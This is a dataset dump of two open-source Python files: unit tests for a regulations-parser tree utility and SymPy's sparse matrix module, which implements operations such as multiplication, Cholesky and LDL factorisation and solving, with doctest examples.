repo_name (stringlengths 5–100) | path (stringlengths 4–299) | copies (stringclasses, 990 values) | size (stringlengths 4–7) | content (stringlengths 666–1.03M) | license (stringclasses, 15 values) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17–100) | line_max (int64, 7–1k) | alpha_frac (float64, 0.25–0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---
grapesmoker/regulations-parser | tests/tree_utils_tests.py | 3 | 4264 | # vim: set encoding=utf-8
import unittest
from lxml import etree
from regparser.tree.struct import Node
from regparser.tree.xml_parser import tree_utils
class TreeUtilsTest(unittest.TestCase):
def test_split_text(self):
text = "(A) Apples (B) Bananas (Z) Zebras"
tokens = ['(A)', '(B)']
result = tree_utils.split_text(text, tokens)
expected = ['(A) Apples ', '(B) Bananas (Z) Zebras']
self.assertEqual(expected, result)
def test_consecutive_markers(self):
text = "(A)(2) Bananas"
tokens = ['(A)', '(2)']
result = tree_utils.split_text(text, tokens)
expected = ['(A)', '(2) Bananas']
self.assertEqual(expected, result)
def test_get_paragraph_marker(self):
text = '(k)(2)(iii) abc (j)'
result = [m for m in tree_utils.get_paragraph_markers(text)]
self.assertEqual(['k', '2', 'iii'], result)
text = '(i)(A) The minimum period payment'
result = [m for m in tree_utils.get_paragraph_markers(text)]
self.assertEqual(['i', 'A'], result)
def test_get_node_text_tags(self):
text = '<P>(a)<E T="03">Fruit.</E>Apples,<PRTPAGE P="102"/> and '
text += 'Pineapples</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text_tags_preserved(doc)
self.assertEquals(
'(a)<E T="03">Fruit.</E>Apples, and Pineapples', result)
def test_no_tags(self):
text = '<P>(a) Fruit. Apples, and Pineapples</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text_tags_preserved(doc)
self.assertEqual('(a) Fruit. Apples, and Pineapples', result)
def test_get_node_text(self):
text = '<P>(a)<E T="03">Fruit.</E>Apps,<PRTPAGE P="102"/> and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc)
self.assertEquals('(a)Fruit.Apps, and pins', result)
text = '<P>(a)<E T="03">Fruit.</E>Apps,<PRTPAGE P="102"/> and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Fruit. Apps, and pins', result)
text = '<P>(a) <E T="03">Fruit.</E> Apps, and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Fruit. Apps, and pins', result)
text = '<P>(a) ABC<E T="52">123</E>= 5</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) ABC_{123} = 5', result)
text = '<P>(a) <E>Keyterm.</E> ABC<E T="52">123</E>= 5</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Keyterm. ABC_{123} = 5', result)
def test_unwind_stack(self):
level_one_n = Node(label=['272'])
level_two_n = Node(label=['a'])
m_stack = tree_utils.NodeStack()
m_stack.push_last((1, level_one_n))
m_stack.add(2, level_two_n)
self.assertEquals(m_stack.size(), 2)
m_stack.unwind()
self.assertEquals(m_stack.size(), 1)
n = m_stack.pop()[0][1]
self.assertEqual(n.children[0].label, ['272', 'a'])
def test_get_collapsed_markers(self):
text = u'(a) <E T="03">Transfer </E>—(1) <E T="03">Notice.</E> follow'
markers = tree_utils.get_collapsed_markers(text)
self.assertEqual(markers, [u'1'])
text = '(1) See paragraph (a) for more'
self.assertEqual([], tree_utils.get_collapsed_markers(text))
text = '(a) (1) More content'
self.assertEqual([], tree_utils.get_collapsed_markers(text))
text = u'(a) <E T="03">Transfer—</E>(1) <E T="03">Notice.</E> follow'
self.assertEqual([u'1'], tree_utils.get_collapsed_markers(text))
text = u'(a) <E T="03">Keyterm</E>—(1)(i) Content'
self.assertEqual(['1', 'i'], tree_utils.get_collapsed_markers(text))
text = "(C) The information required by paragraphs (a)(2), "
text += "(a)(4)(iii), (a)(5), (b) through (d), (i), (l) through (p)"
self.assertEqual([], tree_utils.get_collapsed_markers(text))
| cc0-1.0 | -4,419,260,421,148,290,000 | 36.026087 | 79 | 0.575388 | false |
dennisss/sympy | sympy/matrices/sparse.py | 4 | 43652 | from __future__ import print_function, division
import copy
from collections import defaultdict
from sympy.core.containers import Dict
from sympy.core.compatibility import is_sequence, as_int
from sympy.core.singleton import S
from sympy.functions.elementary.miscellaneous import sqrt
from sympy.utilities.iterables import uniq
from sympy.utilities.exceptions import SymPyDeprecationWarning
from .matrices import MatrixBase, ShapeError, a2idx
from .dense import Matrix
import collections
class SparseMatrix(MatrixBase):
"""
A sparse matrix (a matrix with a large number of zero elements).
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> SparseMatrix(2, 2, range(4))
Matrix([
[0, 1],
[2, 3]])
>>> SparseMatrix(2, 2, {(1, 1): 2})
Matrix([
[0, 0],
[0, 2]])
See Also
========
sympy.matrices.dense.Matrix
"""
def __init__(self, *args):
if len(args) == 1 and isinstance(args[0], SparseMatrix):
self.rows = args[0].rows
self.cols = args[0].cols
self._smat = dict(args[0]._smat)
return
self._smat = {}
if len(args) == 3:
self.rows = as_int(args[0])
self.cols = as_int(args[1])
if isinstance(args[2], collections.Callable):
op = args[2]
for i in range(self.rows):
for j in range(self.cols):
value = self._sympify(op(i, j))
if value:
self._smat[(i, j)] = value
elif isinstance(args[2], (dict, Dict)):
# manual copy, copy.deepcopy() doesn't work
for key in args[2].keys():
v = args[2][key]
if v:
self._smat[key] = v
elif is_sequence(args[2]):
if len(args[2]) != self.rows*self.cols:
raise ValueError(
'List length (%s) != rows*columns (%s)' %
(len(args[2]), self.rows*self.cols))
flat_list = args[2]
for i in range(self.rows):
for j in range(self.cols):
value = self._sympify(flat_list[i*self.cols + j])
if value:
self._smat[(i, j)] = value
else:
# handle full matrix forms with _handle_creation_inputs
r, c, _list = Matrix._handle_creation_inputs(*args)
self.rows = r
self.cols = c
for i in range(self.rows):
for j in range(self.cols):
value = _list[self.cols*i + j]
if value:
self._smat[(i, j)] = value
def __getitem__(self, key):
if isinstance(key, tuple):
i, j = key
try:
i, j = self.key2ij(key)
return self._smat.get((i, j), S.Zero)
except (TypeError, IndexError):
if isinstance(i, slice):
i = range(self.rows)[i]
elif is_sequence(i):
pass
else:
if i >= self.rows:
raise IndexError('Row index out of bounds')
i = [i]
if isinstance(j, slice):
j = range(self.cols)[j]
elif is_sequence(j):
pass
else:
if j >= self.cols:
raise IndexError('Col index out of bounds')
j = [j]
return self.extract(i, j)
# check for single arg, like M[:] or M[3]
if isinstance(key, slice):
lo, hi = key.indices(len(self))[:2]
L = []
for i in range(lo, hi):
m, n = divmod(i, self.cols)
L.append(self._smat.get((m, n), S.Zero))
return L
i, j = divmod(a2idx(key, len(self)), self.cols)
return self._smat.get((i, j), S.Zero)
def __setitem__(self, key, value):
raise NotImplementedError()
def copy(self):
return self._new(self.rows, self.cols, self._smat)
@property
def is_Identity(self):
if not self.is_square:
return False
if not all(self[i, i] == 1 for i in range(self.rows)):
return False
return len(self) == self.rows
def tolist(self):
"""Convert this sparse matrix into a list of nested Python lists.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.tolist()
[[1, 2], [3, 4]]
When there are no rows then it will not be possible to tell how
many columns were in the original matrix:
>>> SparseMatrix(ones(0, 3)).tolist()
[]
"""
if not self.rows:
return []
if not self.cols:
return [[] for i in range(self.rows)]
I, J = self.shape
return [[self[i, j] for j in range(J)] for i in range(I)]
def row(self, i):
"""Returns column i from self as a row vector.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.row(0)
Matrix([[1, 2]])
See Also
========
col
row_list
"""
return self[i,:]
def col(self, j):
"""Returns column j from self as a column vector.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.col(0)
Matrix([
[1],
[3]])
See Also
========
row
col_list
"""
return self[:, j]
def row_list(self):
"""Returns a row-sorted list of non-zero elements of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.RL
[(0, 0, 1), (0, 1, 2), (1, 0, 3), (1, 1, 4)]
See Also
========
row_op
col_list
"""
return [tuple(k + (self[k],)) for k in sorted(list(self._smat.keys()), key=lambda k: list(k))]
RL = property(row_list, None, None, "Alternate faster representation")
def col_list(self):
"""Returns a column-sorted list of non-zero elements of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a=SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.CL
[(0, 0, 1), (1, 0, 3), (0, 1, 2), (1, 1, 4)]
See Also
========
col_op
row_list
"""
return [tuple(k + (self[k],)) for k in sorted(list(self._smat.keys()), key=lambda k: list(reversed(k)))]
CL = property(col_list, None, None, "Alternate faster representation")
def _eval_trace(self):
"""Calculate the trace of a square matrix.
Examples
========
>>> from sympy.matrices import eye
>>> eye(3).trace()
3
"""
trace = S.Zero
for i in range(self.cols):
trace += self._smat.get((i, i), 0)
return trace
def _eval_transpose(self):
"""Returns the transposed SparseMatrix of this SparseMatrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.T
Matrix([
[1, 3],
[2, 4]])
"""
tran = self.zeros(self.cols, self.rows)
for key, value in self._smat.items():
key = key[1], key[0] # reverse
tran._smat[key] = value
return tran
def _eval_conjugate(self):
"""Return the by-element conjugation.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> from sympy import I
>>> a = SparseMatrix(((1, 2 + I), (3, 4), (I, -I)))
>>> a
Matrix([
[1, 2 + I],
[3, 4],
[I, -I]])
>>> a.C
Matrix([
[ 1, 2 - I],
[ 3, 4],
[-I, I]])
See Also
========
transpose: Matrix transposition
H: Hermite conjugation
D: Dirac conjugation
"""
conj = self.copy()
for key, value in self._smat.items():
conj._smat[key] = value.conjugate()
return conj
def multiply(self, other):
"""Fast multiplication exploiting the sparsity of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> A, B = SparseMatrix(ones(4, 3)), SparseMatrix(ones(3, 4))
>>> A.multiply(B) == 3*ones(4)
True
See Also
========
add
"""
A = self
B = other
# sort B's row_list into list of rows
Blist = [[] for i in range(B.rows)]
for i, j, v in B.row_list():
Blist[i].append((j, v))
Cdict = defaultdict(int)
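# accumulate C[k, n] = sum_j A[k, j]*B[j, n], visiting only the non-zero
# entries of A and the matching non-zero row slices of B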
for k, j, Akj in A.row_list():
for n, Bjn in Blist[j]:
temp = Akj*Bjn
Cdict[k, n] += temp
rv = self.zeros(A.rows, B.cols)
rv._smat = dict([(k, v) for k, v in Cdict.items() if v])
return rv
def scalar_multiply(self, scalar):
"Scalar element-wise multiplication"
M = self.zeros(*self.shape)
if scalar:
for i in self._smat:
v = scalar*self._smat[i]
if v:
M._smat[i] = v
else:
M._smat.pop(i, None)
return M
def __mul__(self, other):
"""Multiply self and other, watching for non-matrix entities.
When multiplying by a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye, zeros
>>> I = SparseMatrix(eye(3))
>>> I*I == I
True
>>> Z = zeros(3)
>>> I*Z
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
>>> I*2 == 2*I
True
"""
if isinstance(other, SparseMatrix):
return self.multiply(other)
if isinstance(other, MatrixBase):
return other._new(self*self._new(other))
return self.scalar_multiply(other)
def __rmul__(self, other):
"""Return product the same type as other (if a Matrix).
When multiplying be a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import Matrix, SparseMatrix
>>> A = Matrix(2, 2, range(1, 5))
>>> S = SparseMatrix(2, 2, range(2, 6))
>>> A*S == S*A
False
>>> (isinstance(A*S, SparseMatrix) ==
... isinstance(S*A, SparseMatrix) == False)
True
"""
if isinstance(other, MatrixBase):
return other*other._new(self)
return self.scalar_multiply(other)
def __add__(self, other):
"""Add other to self, efficiently if possible.
When adding a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> A = SparseMatrix(eye(3)) + SparseMatrix(eye(3))
>>> B = SparseMatrix(eye(3)) + eye(3)
>>> A
Matrix([
[2, 0, 0],
[0, 2, 0],
[0, 0, 2]])
>>> A == B
True
>>> isinstance(A, SparseMatrix) and isinstance(B, SparseMatrix)
False
"""
if isinstance(other, SparseMatrix):
return self.add(other)
elif isinstance(other, MatrixBase):
return other._new(other + self)
else:
raise NotImplementedError(
"Cannot add %s to %s" %
tuple([c.__class__.__name__ for c in (other, self)]))
def __neg__(self):
"""Negate all elements of self.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> -SparseMatrix(eye(3))
Matrix([
[-1, 0, 0],
[ 0, -1, 0],
[ 0, 0, -1]])
"""
rv = self.copy()
for k, v in rv._smat.items():
rv._smat[k] = -v
return rv
def add(self, other):
"""Add two sparse matrices with dictionary representation.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye, ones
>>> SparseMatrix(eye(3)).add(SparseMatrix(ones(3)))
Matrix([
[2, 1, 1],
[1, 2, 1],
[1, 1, 2]])
>>> SparseMatrix(eye(3)).add(-SparseMatrix(eye(3)))
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
Only the non-zero elements are stored, so the resulting dictionary
that is used to represent the sparse matrix is empty:
>>> _._smat
{}
See Also
========
multiply
"""
if not isinstance(other, SparseMatrix):
raise ValueError('only use add with %s, not %s' %
tuple([c.__class__.__name__ for c in (self, other)]))
if self.shape != other.shape:
raise ShapeError()
M = self.copy()
for i, v in other._smat.items():
v = M[i] + v
if v:
M._smat[i] = v
else:
M._smat.pop(i, None)
return M
def extract(self, rowsList, colsList):
urow = list(uniq(rowsList))
ucol = list(uniq(colsList))
smat = {}
if len(urow)*len(ucol) < len(self._smat):
# there are fewer elements requested than there are elements in the matrix
for i, r in enumerate(urow):
for j, c in enumerate(ucol):
smat[i, j] = self._smat.get((r, c), 0)
else:
# most of the request will be zeros so check all of self's entries,
# keeping only the ones that are desired
for rk, ck in self._smat:
if rk in urow and ck in ucol:
smat[(urow.index(rk), ucol.index(ck))] = self._smat[(rk, ck)]
rv = self._new(len(urow), len(ucol), smat)
# rv is nominally correct but there might be rows/cols
# which require duplication
if len(rowsList) != len(urow):
for i, r in enumerate(rowsList):
i_previous = rowsList.index(r)
if i_previous != i:
rv = rv.row_insert(i, rv.row(i_previous))
if len(colsList) != len(ucol):
for i, c in enumerate(colsList):
i_previous = colsList.index(c)
if i_previous != i:
rv = rv.col_insert(i, rv.col(i_previous))
return rv
extract.__doc__ = MatrixBase.extract.__doc__
def is_symmetric(self, simplify=True):
"""Return True if self is symmetric.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> M = SparseMatrix(eye(3))
>>> M.is_symmetric()
True
>>> M[0, 2] = 1
>>> M.is_symmetric()
False
"""
if simplify:
return all((k[1], k[0]) in self._smat and
not (self[k] - self[(k[1], k[0])]).simplify()
for k in self._smat)
else:
return all((k[1], k[0]) in self._smat and
self[k] == self[(k[1], k[0])] for k in self._smat)
def has(self, *patterns):
"""Test whether any subexpression matches any of the patterns.
Examples
========
>>> from sympy import SparseMatrix, Float
>>> from sympy.abc import x, y
>>> A = SparseMatrix(((1, x), (0.2, 3)))
>>> A.has(x)
True
>>> A.has(y)
False
>>> A.has(Float)
True
"""
return any(self[key].has(*patterns) for key in self._smat)
def applyfunc(self, f):
"""Apply a function to each element of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> m = SparseMatrix(2, 2, lambda i, j: i*2+j)
>>> m
Matrix([
[0, 1],
[2, 3]])
>>> m.applyfunc(lambda i: 2*i)
Matrix([
[0, 2],
[4, 6]])
"""
if not callable(f):
raise TypeError("`f` must be callable.")
out = self.copy()
for k, v in self._smat.items():
fv = f(v)
if fv:
out._smat[k] = fv
else:
out._smat.pop(k, None)
return out
def reshape(self, rows, cols):
"""Reshape matrix while retaining original size.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix(4, 2, range(8))
>>> S.reshape(2, 4)
Matrix([
[0, 1, 2, 3],
[4, 5, 6, 7]])
"""
if len(self) != rows*cols:
raise ValueError("Invalid reshape parameters %d %d" % (rows, cols))
smat = {}
for k, v in self._smat.items():
i, j = k
n = i*self.cols + j
ii, jj = divmod(n, cols)
smat[(ii, jj)] = self._smat[(i, j)]
return self._new(rows, cols, smat)
def liupc(self):
"""Liu's algorithm, for pre-determination of the Elimination Tree of
the given matrix, used in row-based symbolic Cholesky factorization.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix([
... [1, 0, 3, 2],
... [0, 0, 1, 0],
... [4, 0, 0, 5],
... [0, 6, 7, 0]])
>>> S.liupc()
([[0], [], [0], [1, 2]], [4, 3, 4, 4])
References
==========
Symbolic Sparse Cholesky Factorization using Elimination Trees,
Jeroen Van Grondelle (1999)
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.39.7582
"""
# Algorithm 2.4, p 17 of reference
# get the indices of the elements that are non-zero on or below diag
R = [[] for r in range(self.rows)]
for r, c, _ in self.row_list():
if c <= r:
R[r].append(c)
inf = len(R) # nothing will be this large
parent = [inf]*self.rows
virtual = [inf]*self.rows
for r in range(self.rows):
for c in R[r][:-1]:
while virtual[c] < r:
t = virtual[c]
virtual[c] = r
c = t
if virtual[c] == inf:
parent[c] = virtual[c] = r
return R, parent
def row_structure_symbolic_cholesky(self):
"""Symbolic cholesky factorization, for pre-determination of the
non-zero structure of the Cholesky factororization.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix([
... [1, 0, 3, 2],
... [0, 0, 1, 0],
... [4, 0, 0, 5],
... [0, 6, 7, 0]])
>>> S.row_structure_symbolic_cholesky()
[[0], [], [0], [1, 2]]
References
==========
Symbolic Sparse Cholesky Factorization using Elimination Trees,
Jeroen Van Grondelle (1999)
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.39.7582
"""
R, parent = self.liupc()
inf = len(R) # this acts as infinity
Lrow = copy.deepcopy(R)
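# for every structural non-zero in row k, walk up the elimination tree
# (via ``parent``) recording each ancestor column until the walk reaches
# the diagonal entry k itself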
for k in range(self.rows):
for j in R[k]:
while j != inf and j != k:
Lrow[k].append(j)
j = parent[j]
Lrow[k] = list(sorted(set(Lrow[k])))
return Lrow
def _cholesky_sparse(self):
"""Algorithm for numeric Cholesky factorization of a sparse matrix."""
Crowstruc = self.row_structure_symbolic_cholesky()
C = self.zeros(self.rows)
for i in range(len(Crowstruc)):
for j in Crowstruc[i]:
if i != j:
C[i, j] = self[i, j]
summ = 0
for p1 in Crowstruc[i]:
if p1 < j:
for p2 in Crowstruc[j]:
if p2 < j:
if p1 == p2:
summ += C[i, p1]*C[j, p1]
else:
break
else:
break
C[i, j] -= summ
C[i, j] /= C[j, j]
else:
C[j, j] = self[j, j]
summ = 0
for k in Crowstruc[j]:
if k < j:
summ += C[j, k]**2
else:
break
C[j, j] -= summ
C[j, j] = sqrt(C[j, j])
return C
def _LDL_sparse(self):
"""Algorithm for numeric LDL factization, exploiting sparse structure.
"""
Lrowstruc = self.row_structure_symbolic_cholesky()
L = self.eye(self.rows)
D = self.zeros(self.rows, self.cols)
for i in range(len(Lrowstruc)):
for j in Lrowstruc[i]:
if i != j:
L[i, j] = self[i, j]
summ = 0
for p1 in Lrowstruc[i]:
if p1 < j:
for p2 in Lrowstruc[j]:
if p2 < j:
if p1 == p2:
summ += L[i, p1]*L[j, p1]*D[p1, p1]
else:
break
else:
break
L[i, j] -= summ
L[i, j] /= D[j, j]
elif i == j:
D[i, i] = self[i, i]
summ = 0
for k in Lrowstruc[i]:
if k < i:
summ += L[i, k]**2*D[k, k]
else:
break
D[i, i] -= summ
return L, D
def _lower_triangular_solve(self, rhs):
"""Fast algorithm for solving a lower-triangular system,
exploiting the sparsity of the given matrix.
"""
rows = [[] for i in range(self.rows)]
for i, j, v in self.row_list():
if i > j:
rows[i].append((j, v))
X = rhs.copy()
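# forward substitution: ``rows`` holds only the strictly lower-triangular
# non-zeros of each row, so every solve step touches just the stored entries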
for i in range(self.rows):
for j, v in rows[i]:
X[i, 0] -= v*X[j, 0]
X[i, 0] /= self[i, i]
return self._new(X)
def _upper_triangular_solve(self, rhs):
"""Fast algorithm for solving an upper-triangular system,
exploiting the sparsity of the given matrix.
"""
rows = [[] for i in range(self.rows)]
for i, j, v in self.row_list():
if i < j:
rows[i].append((j, v))
X = rhs.copy()
for i in range(self.rows - 1, -1, -1):
rows[i].reverse()
for j, v in rows[i]:
X[i, 0] -= v*X[j, 0]
X[i, 0] /= self[i, i]
return self._new(X)
def _diagonal_solve(self, rhs):
"Diagonal solve."
return self._new(self.rows, 1, lambda i, j: rhs[i, 0] / self[i, i])
def _cholesky_solve(self, rhs):
# for speed reasons, the symmetry assertion below is left commented
# out; if you are having difficulties, uncomment it to make sure that
# the input matrix is symmetric
#assert self.is_symmetric()
L = self._cholesky_sparse()
Y = L._lower_triangular_solve(rhs)
rv = L.T._upper_triangular_solve(Y)
return rv
def _LDL_solve(self, rhs):
# for speed reasons, the symmetry assertion below is left commented
# out; if you are having difficulties, uncomment it to make sure that
# the input matrix is symmetric
#assert self.is_symmetric()
L, D = self._LDL_sparse()
Z = L._lower_triangular_solve(rhs)
Y = D._diagonal_solve(Z)
return L.T._upper_triangular_solve(Y)
def cholesky(self):
"""
Returns the Cholesky decomposition L of a matrix A
such that L * L.T = A
A must be a square, symmetric, positive-definite
and non-singular matrix
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> A = SparseMatrix(((25,15,-5),(15,18,0),(-5,0,11)))
>>> A.cholesky()
Matrix([
[ 5, 0, 0],
[ 3, 3, 0],
[-1, 1, 3]])
>>> A.cholesky() * A.cholesky().T == A
True
"""
from sympy.core.numbers import nan, oo
if not self.is_symmetric():
raise ValueError('Cholesky decomposition applies only to '
'symmetric matrices.')
M = self.as_mutable()._cholesky_sparse()
if M.has(nan) or M.has(oo):
raise ValueError('Cholesky decomposition applies only to '
'positive-definite matrices')
return self._new(M)
def LDLdecomposition(self):
"""
Returns the LDL Decomposition (matrices ``L`` and ``D``) of matrix
``A``, such that ``L * D * L.T == A``. ``A`` must be a square,
symmetric, positive-definite and non-singular.
This method eliminates the use of square root and ensures that all
the diagonal entries of L are 1.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> A = SparseMatrix(((25, 15, -5), (15, 18, 0), (-5, 0, 11)))
>>> L, D = A.LDLdecomposition()
>>> L
Matrix([
[ 1, 0, 0],
[ 3/5, 1, 0],
[-1/5, 1/3, 1]])
>>> D
Matrix([
[25, 0, 0],
[ 0, 9, 0],
[ 0, 0, 9]])
>>> L * D * L.T == A
True
"""
from sympy.core.numbers import nan, oo
if not self.is_symmetric():
raise ValueError('LDL decomposition applies only to '
'symmetric matrices.')
L, D = self.as_mutable()._LDL_sparse()
if L.has(nan) or L.has(oo) or D.has(nan) or D.has(oo):
raise ValueError('LDL decomposition applies only to '
'positive-definite matrices')
return self._new(L), self._new(D)
def solve_least_squares(self, rhs, method='LDL'):
"""Return the least-square fit to the data.
By default the cholesky_solve routine is used (method='CH'); other
methods of matrix inversion can be used. To find out which are
available, see the docstring of the .inv() method.
Examples
========
>>> from sympy.matrices import SparseMatrix, Matrix, ones
>>> A = Matrix([1, 2, 3])
>>> B = Matrix([2, 3, 4])
>>> S = SparseMatrix(A.row_join(B))
>>> S
Matrix([
[1, 2],
[2, 3],
[3, 4]])
If each line of S represents coefficients of Ax + By
and x and y are [2, 3] then S*xy is:
>>> r = S*Matrix([2, 3]); r
Matrix([
[ 8],
[13],
[18]])
But let's add 1 to the middle value and then solve for the
least-squares value of xy:
>>> xy = S.solve_least_squares(Matrix([8, 14, 18])); xy
Matrix([
[ 5/3],
[10/3]])
The error is given by S*xy - r:
>>> S*xy - r
Matrix([
[1/3],
[1/3],
[1/3]])
>>> _.norm().n(2)
0.58
If a different xy is used, the norm will be higher:
>>> xy += ones(2, 1)/10
>>> (S*xy - r).norm().n(2)
1.5
"""
t = self.T
return (t*self).inv(method=method)*t*rhs
def solve(self, rhs, method='LDL'):
"""Return solution to self*soln = rhs using given inversion method.
For a list of possible inversion methods, see the .inv() docstring.
"""
if not self.is_square:
if self.rows < self.cols:
raise ValueError('Under-determined system.')
elif self.rows > self.cols:
raise ValueError('For over-determined system, M, having '
'more rows than columns, try M.solve_least_squares(rhs).')
else:
return self.inv(method=method)*rhs
def _eval_inverse(self, **kwargs):
"""Return the matrix inverse using Cholesky or LDL (default)
decomposition as selected with the ``method`` keyword: 'CH' or 'LDL',
respectively.
Examples
========
>>> from sympy import SparseMatrix, Matrix
>>> A = SparseMatrix([
... [ 2, -1, 0],
... [-1, 2, -1],
... [ 0, 0, 2]])
>>> A.inv('CH')
Matrix([
[2/3, 1/3, 1/6],
[1/3, 2/3, 1/3],
[ 0, 0, 1/2]])
>>> A.inv(method='LDL') # use of 'method=' is optional
Matrix([
[2/3, 1/3, 1/6],
[1/3, 2/3, 1/3],
[ 0, 0, 1/2]])
>>> A * _
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
"""
sym = self.is_symmetric()
M = self.as_mutable()
I = M.eye(M.rows)
if not sym:
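# for a non-symmetric matrix, work with the normal equations instead:
# solving (M.T*M)*x = M.T*e_i keeps the coefficient matrix symmetric so
# the CH/LDL solvers below still apply; r1 (the first row of the original
# M) is saved and used to rescale the result at the end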
t = M.T
r1 = M[0, :]
M = t*M
I = t*I
method = kwargs.get('method', 'LDL')
if method in "LDL":
solve = M._LDL_solve
elif method == "CH":
solve = M._cholesky_solve
else:
raise NotImplementedError(
'Method may be "CH" or "LDL", not %s.' % method)
rv = M.hstack(*[solve(I[:, i]) for i in range(I.cols)])
if not sym:
scale = (r1*rv[:, 0])[0, 0]
rv /= scale
return self._new(rv)
def __eq__(self, other):
try:
if self.shape != other.shape:
return False
if isinstance(other, SparseMatrix):
return self._smat == other._smat
elif isinstance(other, MatrixBase):
return self._smat == MutableSparseMatrix(other)._smat
except AttributeError:
return False
def __ne__(self, other):
return not self == other
def as_mutable(self):
"""Returns a mutable version of this matrix.
Examples
========
>>> from sympy import ImmutableMatrix
>>> X = ImmutableMatrix([[1, 2], [3, 4]])
>>> Y = X.as_mutable()
>>> Y[1, 1] = 5 # Can set values in Y
>>> Y
Matrix([
[1, 2],
[3, 5]])
"""
return MutableSparseMatrix(self)
def as_immutable(self):
"""Returns an Immutable version of this Matrix."""
from .immutable import ImmutableSparseMatrix
return ImmutableSparseMatrix(self)
def nnz(self):
"""Returns the number of non-zero elements in Matrix."""
return len(self._smat)
@classmethod
def zeros(cls, r, c=None):
"""Return an r x c matrix of zeros, square if c is omitted."""
c = r if c is None else c
r = as_int(r)
c = as_int(c)
return cls(r, c, {})
@classmethod
def eye(cls, n):
"""Return an n x n identity matrix."""
n = as_int(n)
return cls(n, n, dict([((i, i), S.One) for i in range(n)]))
class MutableSparseMatrix(SparseMatrix, MatrixBase):
@classmethod
def _new(cls, *args, **kwargs):
return cls(*args)
def as_mutable(self):
return self.copy()
def __setitem__(self, key, value):
"""Assign value to position designated by key.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> M = SparseMatrix(2, 2, {})
>>> M[1] = 1; M
Matrix([
[0, 1],
[0, 0]])
>>> M[1, 1] = 2; M
Matrix([
[0, 1],
[0, 2]])
>>> M = SparseMatrix(2, 2, {})
>>> M[:, 1] = [1, 1]; M
Matrix([
[0, 1],
[0, 1]])
>>> M = SparseMatrix(2, 2, {})
>>> M[1, :] = [[1, 1]]; M
Matrix([
[0, 0],
[1, 1]])
To replace row r you assign to position r*m where m
is the number of columns:
>>> M = SparseMatrix(4, 4, {})
>>> m = M.cols
>>> M[3*m] = ones(1, m)*2; M
Matrix([
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[2, 2, 2, 2]])
And to replace column c you can assign to position c:
>>> M[2] = ones(m, 1)*4; M
Matrix([
[0, 0, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0],
[2, 2, 4, 2]])
"""
rv = self._setitem(key, value)
if rv is not None:
i, j, value = rv
if value:
self._smat[(i, j)] = value
elif (i, j) in self._smat:
del self._smat[(i, j)]
__hash__ = None
def row_del(self, k):
"""Delete the given row of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix([[0, 0], [0, 1]])
>>> M
Matrix([
[0, 0],
[0, 1]])
>>> M.row_del(0)
>>> M
Matrix([[0, 1]])
See Also
========
col_del
"""
newD = {}
k = a2idx(k, self.rows)
for (i, j) in self._smat:
if i == k:
pass
elif i > k:
newD[i - 1, j] = self._smat[i, j]
else:
newD[i, j] = self._smat[i, j]
self._smat = newD
self.rows -= 1
def col_del(self, k):
"""Delete the given column of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix([[0, 0], [0, 1]])
>>> M
Matrix([
[0, 0],
[0, 1]])
>>> M.col_del(0)
>>> M
Matrix([
[0],
[1]])
See Also
========
row_del
"""
newD = {}
k = a2idx(k, self.cols)
for (i, j) in self._smat:
if j == k:
pass
elif j > k:
newD[i, j - 1] = self._smat[i, j]
else:
newD[i, j] = self._smat[i, j]
self._smat = newD
